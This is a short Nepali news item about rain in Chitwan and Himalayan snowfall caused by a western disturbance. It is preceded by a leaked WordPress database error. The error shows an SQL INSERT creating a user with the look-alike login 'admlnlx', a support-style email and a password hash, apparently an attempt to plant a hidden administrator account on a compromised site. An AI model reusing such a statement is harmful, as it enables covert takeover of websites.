WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BF3C4vx5SMYl1cjhUgb31fgIibK01a/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 01:08:39', '', 'admlnlx', 'admlnlx')
चितवन, माघ १४–
पश्चिमी वायुको प्रभावका कारण आज चितवनसहित देशभर मौसम बदली भएको छ । चितवनमा आज विहानैदेखि हल्का वर्षा भई रहेको छ । यस्तै देशका उच्च हिमाली भेगमा हिमपात समेत भएको छ ।
आज विहानैदेखि पानी र हिमपातका कारण केही चिसो महसुस भए पनि अब भने जाडो हराउँदै जाने मौसमविदको दाबी छ ।
चितवनका नारायणगढ, भरतपुर, नवलपरासीको गैंडाकोटलगायतका स्थानमा छिटपुट वर्षा भईरहेको छ ।
पश्चिम र मध्य नेपालको तुलनामा पूर्वी नेपालमा भने मौसममा कम बदली भएको छ ।